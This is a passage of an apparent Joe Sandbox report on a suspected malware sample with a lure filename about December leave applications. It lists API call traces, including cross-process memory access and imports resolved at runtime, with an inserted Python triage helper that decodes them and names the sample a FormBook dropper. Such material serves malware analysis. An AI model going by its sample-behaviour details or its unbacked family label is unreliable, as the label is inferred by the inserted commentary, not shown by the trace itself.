                                                      • EndDialog.USER32(?,00000001), ref: 00FBECF9
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00F9B0BA
                                                      • StrokeAndFillPath.GDI32(?,?,00FFE680,00000000,?,?,?), ref: 00F9B0D6
                                                      • SelectObject.GDI32(?,00000000), ref: 00F9B0E9
                                                      • DeleteObject.GDI32 ref: 00F9B0FC
                                                      • StrokePath.GDI32(?), ref: 00F9B117
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00FCF2DA
                                                      • CoCreateInstance.OLE32(0100DA7C,00000000,00000001,0100D8EC,?), ref: 00FCF2F2
                                                      • CoUninitialize.OLE32 ref: 00FCF555
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize
                                                      • String ID: .lnk
                                                      • API String ID: 948891078-24824748
                                                      APIs
                                                        • Part of subcall function 00F8660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F853B1,?,?,00F861FF,?,00000000,00000001,00000000), ref: 00F8662F
                                                      • CoInitialize.OLE32(00000000), ref: 00FCE85D
                                                      • CoCreateInstance.OLE32(0100DA7C,00000000,00000001,0100D8EC,?), ref: 00FCE876
                                                      • CoUninitialize.OLE32 ref: 00FCE893
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00FA32ED
                                                        • Part of subcall function 00FAE0D0: __87except.LIBCMT ref: 00FAE10B
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      APIs
                                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0101DC50,?,0000000F,0000000C,00000016,0101DC50,?), ref: 00FC4645
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00FC46C5
                                                      Similarity
                                                      • API ID: BuffCharUpper$__itow__swprintf
                                                      • String ID: REMOVE$THIS
                                                      • API String ID: 3797816924-776492005
                                                      APIs
                                                        • Part of subcall function 00FC430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FBBC08,?,?,00000034,00000800,?,00000034), ref: 00FC4335
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FBC1D3
                                                        • Part of subcall function 00FC42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FBBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00FC4300
                                                        • Part of subcall function 00FC422F: GetWindowThreadProcessId.USER32(?,?), ref: 00FC425A
                                                        • Part of subcall function 00FC422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FBBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FC426A
                                                        • Part of subcall function 00FC422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FBBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FC4280
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FBC240
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FBC28D
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: ca80c996f06f028615d64dfe545816074c4a1e9be61341025d7d53fd0c0bc321
                                                      • Instruction ID: 22fa3dfdf7cf686079d081066fc4cacac2cc2ad9d1d7f553aa63b10d505b6505
                                                      • Opcode Fuzzy Hash: ca80c996f06f028615d64dfe545816074c4a1e9be61341025d7d53fd0c0bc321
                                                      • Instruction Fuzzy Hash: 1C415C72900219AFDB11DFA4CD92FEEB7B8AF09710F004099FA45B7180DA756E45DBA1
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0101DC00,00000000,?,?,?,?), ref: 00FEA6D8
                                                      • GetWindowLongW.USER32 ref: 00FEA6F5
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FEA705
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 2cd5ee96e24ed1107ea6c44e41a60cf36decb164cff9fd208be50018ae9852c4
                                                      • Instruction ID: 924d44b66b3a709bd650e4ee0641636e39548205ede5b82a983ce6cf36875ef5
                                                      • Opcode Fuzzy Hash: 2cd5ee96e24ed1107ea6c44e41a60cf36decb164cff9fd208be50018ae9852c4
                                                      • Instruction Fuzzy Hash: 8531AE31500249ABDF218E79CC41BEA77A9EB49334F244725F8B5921E0C735E850AB50
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FEA15E
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FEA172
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00FEA196
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: d84f1704cf84e953953097183e3a72c7b5b0154e5cb1f90dd0adc400eae2f143
                                                      • Instruction ID: 96b388b0fb5df2a07ab044c26d38e0165b176ea9ba69b62724e48de16ca32e8d
                                                      • Opcode Fuzzy Hash: d84f1704cf84e953953097183e3a72c7b5b0154e5cb1f90dd0adc400eae2f143
                                                      • Instruction Fuzzy Hash: 9E21A332510218ABEF158F94CC82FEA3B79EF48764F110214FE556B1D0D6B9BC51DBA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FEA941
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FEA94F
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FEA956
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: aa9c53df964f87d7e7f4b5fcc655a39cfd95ee86735bb8158690b4704e3c8b4d
                                                      • Instruction ID: 808b269609a942786b904513351520b8f67210bc8e0fc0b0868138f50ec22549
                                                      • Opcode Fuzzy Hash: aa9c53df964f87d7e7f4b5fcc655a39cfd95ee86735bb8158690b4704e3c8b4d
                                                      • Instruction Fuzzy Hash: CF21AEB5600209AFEB11DF69CCC1D7B37ADEF4A3A4B040059FA449B252CA35FC519B71
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FE9A30
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FE9A40
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FE9A65
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 0362d709e17f182d781e380f97c8d8b33a94c9f2de3cc126be6701c64dcfa7d1
                                                      • Instruction ID: 1ca3be174dd02aa4e0423a044ea3c36e9d6c6e572b186a6de2ac49e623a47eff
                                                      • Opcode Fuzzy Hash: 0362d709e17f182d781e380f97c8d8b33a94c9f2de3cc126be6701c64dcfa7d1
                                                      • Instruction Fuzzy Hash: 4921F532A04118BFDF228F55CC85FBF3BAAEF89760F018129F9549B190C6B59C5197A0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FEA46D
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FEA482
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FEA48F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 67a7d361650dd23dcf3a2225678b74ed5a777e1612c5563b3d11dba9a22da806
                                                      • Instruction ID: 3e1091742f69358ce5a22721f33420f3f7c2ae7aa4ef1818f5a7f71b53155194
                                                      • Opcode Fuzzy Hash: 67a7d361650dd23dcf3a2225678b74ed5a777e1612c5563b3d11dba9a22da806
                                                      • Instruction Fuzzy Hash: DC110A71600248BEEF259F65CC45FAB376DEF88764F114118FA45960E1D2B6E811D720
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FA2350,?), ref: 00FA22A1
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FA22A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 2574300362-340411864
                                                      • Opcode ID: b5b4ed6075076840cdc78fe1b918dc261d24ff4f24a24105071a39aa6d2b32df
                                                      • Instruction ID: d77d58f6414809805f73c46ee8d73805a3c7e4b22f561a8a364eef70a1bc9f98
                                                      • Opcode Fuzzy Hash: b5b4ed6075076840cdc78fe1b918dc261d24ff4f24a24105071a39aa6d2b32df
                                                      • Instruction Fuzzy Hash: 00E012B4A90300ABFB715FF5DE89B543654A711711F004024B6C1E609CCBBE4040DF14
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FA2276), ref: 00FA2376
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00FA237D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 2574300362-2819208100
                                                      • Opcode ID: 92490cd7ac9f22a9d9bdc7f369653f80a7b938bc891754525368ee98e96e571b
                                                      • Instruction ID: 549791004942759cebe7cedae53c2d7d95e29d734b6801f33d4aa11fceaeaba2
                                                      • Opcode Fuzzy Hash: 92490cd7ac9f22a9d9bdc7f369653f80a7b938bc891754525368ee98e96e571b
                                                      • Instruction Fuzzy Hash: E5E0B6B8644300EBEB72AFE1EE5DB453A69B715716F100424F2C9E60ACCBBF94409B24
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: c5dabe365e6ae34f51f96e1df1d152a195d9a70cda3f8746c699a149e7281591
                                                      • Instruction ID: 678b4cd48f51c06ed8777811d95a9b136bc38e20a36394cadbef88c0321a3237
                                                      • Opcode Fuzzy Hash: c5dabe365e6ae34f51f96e1df1d152a195d9a70cda3f8746c699a149e7281591
                                                      • Instruction Fuzzy Hash: 93E0ECF280461C9BCB519B90CD05AF9737CAB04741F500092BA4AA1024E639DB84BB22
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00F842EC,?,00F842AA,?), ref: 00F84304
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F84316
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: d4e23bf49f08e41ca956d4a4f2318de324fa820f150d3408aba656c209747797
                                                      • Instruction ID: 0469f59d9ca976a2f19ec5c6d5995d295278aab82e4786b7a0281c08357ad451
                                                      • Opcode Fuzzy Hash: d4e23bf49f08e41ca956d4a4f2318de324fa820f150d3408aba656c209747797
                                                      • Instruction Fuzzy Hash: 2ED05E30800713AEC7216BA1A40868276D8AB04311F00481EA4C1D2114DB74D8809B60
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00FE21FB,?,00FE23EF), ref: 00FE2213
                                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00FE2225
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetProcessId$kernel32.dll
                                                      • API String ID: 2574300362-399901964
                                                      • Opcode ID: 58c04769ea468d0cef83756ce8a059cda16654fd00cbd74cc1c94eb3a190d930
                                                      • Instruction ID: 64de3277f9b315c2da98b915305c70481fa8444429f0597f45bed335ac6c9354
                                                      • Opcode Fuzzy Hash: 58c04769ea468d0cef83756ce8a059cda16654fd00cbd74cc1c94eb3a190d930
                                                      • Instruction Fuzzy Hash: 3AD0A735C00712AFD7325FB2F40864176DCEB48311F00441DE8C1E2100EF75D8809770
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00F841BB,00F84341,?,00F8422F,?,00F841BB,?,?,?,?,00F839FE,?,00000001), ref: 00F84359
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F8436B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: ea386e64d3ddcdde37da79f6628edc7fb3e7cc78b7efc71cc8f176fcae982b2d
                                                      • Instruction ID: 21f07e0b54047e1fc36e7d2bb9f4f15bb404a74b6d127a54f888da2a908fb154
                                                      • Opcode Fuzzy Hash: ea386e64d3ddcdde37da79f6628edc7fb3e7cc78b7efc71cc8f176fcae982b2d
                                                      • Instruction Fuzzy Hash: 48D0A730800713EFC7316FF2E40868176DCAB14725F00442EE4C1D2100DF74E8809770
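Reading the call records: the two subcall lines at the top of this section (OpenProcess with access mask 00000438, then VirtualAllocEx with 00001000/00000004) and the LoadLibraryA/GetProcAddress pairs in the records above are the parts of these dumps a reviewer actually decodes. The following Python triage helper is an added example, not part of the Joe Sandbox report or of the sample. It parses "APIs" call lines copied verbatim from this page (a constructed excerpt embedded inline), expands the OpenProcess mask 0x438 into PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION (enough to read and write another process's memory, but without PROCESS_CREATE_THREAD), decodes VirtualAllocEx(MEM_COMMIT, PAGE_READWRITE), and lists exports resolved at runtime. Splitting records on the "APIs" header and the wording of the findings are the editor's own conventions, not the report's. One caveat on the first record: 0x1111 in the adjacent SendMessageW is TVM_HITTEST (TV_FIRST + 17), whose TVHITTESTINFO parameter must reside in the process that owns the tree view, so a remote PAGE_READWRITE allocation next to it is what any cross-process control-interaction routine, including an AutoIt runtime's, needs; this one record does not by itself separate runtime control code from an injector, and the helper labels it as a data allocation rather than as injection.

```python
"""Triage helper for Joe Sandbox "APIs" entries (added example, not part of the report).

Parses call lines of the form shown in the function records, decodes the
OpenProcess access mask and VirtualAllocEx flags, and flags two things worth a
second look in an AutoIt-compiled FormBook dropper: a cross-process memory
primitive and exports resolved at runtime through LoadLibrary*/GetProcAddress.
"""
import re
from dataclasses import dataclass

# Constructed excerpt: the call lines are copied from the function records on
# this page; the "APIs" lines mark record boundaries exactly as the report does.
SAMPLE = """\
APIs
• Part of subcall function 00FC422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FBBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FC426A
• Part of subcall function 00FC422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FBBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00FC4280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FBC240
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FA2350,?), ref: 00FA22A1
• GetProcAddress.KERNEL32(00000000), ref: 00FA22A8
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00F841BB,00F84341,?,00F8422F,?,00F841BB,?,?,?,?,00F839FE,?,00000001), ref: 00F84359
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F8436B
"""

# Windows constants (winnt.h / memoryapi.h); only the bits relevant here.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# One report call line: optional "Part of subcall" prefix, API.MODULE(args), ref: address
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str


def parse_records(text):
    """Return one list of Call objects per "APIs" record; non-call lines are ignored."""
    records, current = [], []
    for line in text.splitlines():
        if line.strip() == "APIs":
            if current:
                records.append(current)
            current = []
            continue
        m = CALL_RE.match(line)
        if m:
            current.append(Call(m["api"], m["mod"], m["args"].split(","), m["ref"]))
    if current:
        records.append(current)
    return records


def hex_arg(arg):
    """Decode an 8-digit hex argument; '?' (unknown to the analyzer) or a name gives None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_flags(value, table):
    """Render a bitmask as NAME|NAME, keeping any bits the table does not cover as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    unknown = value & ~sum(table)
    if unknown:
        names.append(hex(unknown))
    return "|".join(names) or "0"


def triage(records):
    """Flag cross-process memory primitives and runtime-resolved imports per record."""
    findings = []
    for rec in records:
        by_api = {c.api: c for c in rec}
        if "OpenProcess" in by_api and "VirtualAllocEx" in by_api:
            op, va = by_api["OpenProcess"], by_api["VirtualAllocEx"]
            rights = hex_arg(op.args[0])
            # VirtualAllocEx(hProcess, lpAddress, dwSize, flAllocationType, flProtect)
            alloc, prot = hex_arg(va.args[3]), hex_arg(va.args[4])
            executable = prot is not None and bool(prot & 0xF0)  # PAGE_EXECUTE* bits
            findings.append(
                f"remote {'EXECUTABLE' if executable else 'data'} allocation @ {va.ref}: "
                f"OpenProcess({decode_flags(rights, PROCESS_RIGHTS) if rights is not None else '?'}) + "
                f"VirtualAllocEx({decode_flags(alloc, ALLOC_TYPES) if alloc is not None else '?'}, "
                f"{PAGE_PROTECT.get(prot, '?')})"
            )
        loaded = None
        for c in rec:
            if c.api.startswith("LoadLibrary"):
                loaded = c.args[0]
            elif c.api == "GetProcAddress" and loaded:
                # The export name is only visible when the analyzer captured it as a string.
                export = c.args[1] if len(c.args) > 1 and hex_arg(c.args[1]) is None else "?"
                findings.append(f"runtime import @ {c.ref}: {loaded}!{export}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_records(SAMPLE)):
        print(finding)
```

Fed the whole function-record text of a report, parse_records yields one entry per "APIs" header, so the helper scales to the full listing; extend PROCESS_RIGHTS and PAGE_PROTECT if other masks appear. Resolving Wow64DisableWow64FsRedirection through GetProcAddress, as the third record shows, is the standard way a 32-bit image reaches the native System32 on 64-bit Windows while staying loadable on systems where the export is absent; on its own it is as consistent with an AutoIt runtime as with a dropper, so treat it as context for the other findings rather than as an indicator.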
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00FC052F,?,00FC06D7), ref: 00FC0572
                                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00FC0584
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
